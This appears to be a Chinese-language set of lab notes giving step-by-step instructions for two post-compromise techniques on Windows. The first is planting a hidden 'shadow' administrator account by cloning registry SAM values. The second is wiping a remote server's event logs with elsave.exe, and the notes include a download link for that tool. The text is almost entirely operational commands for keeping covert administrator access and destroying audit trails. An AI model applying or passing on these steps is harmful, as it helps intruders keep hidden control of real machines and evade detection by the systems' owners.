建立影子账户+清理日志

一、建一个影子账户

1、net user admin$ 123 /add【添加一个admin$用户】

2、net user【看不到admin$用户】

3、计算机管理【可看到admin$用户】

4、regedit【打开注册表】

将administrators的权限最大---->刷新

将000001F4的F用户----点开----复制

将000003F8的F用户---点开---粘贴

再将3F8和admin$导出到桌面

5、>net user admin$ /del【删除admin$用户】

6、计算机管理------>已经看不到admin$了

7、注册表右击第二个SAM--->把administrators权限降到最低

8、gpedit.msc【打开本地组策略编辑器】

9、重启用admin$/123可登陆win7

二、日志清除

1、虚拟机---->winserver2000---->192.168.17.129

2、开始--设置--控制面板--管理工具--事件查看器

包括a.应用程序日志

        b.安全日志

        c.系统日志

3、win7删除应用程序日志

cmd---把elsave.exe拖到里面然后输入

-s \\192.168.17.129 -l "application" -C

4、server2000---事件查看器---应用程序日志

被清空---成功删除日志

【附上elsave.exe的下载链接】链接: https://pan.baidu.com/s/1boXET47 密码: p7if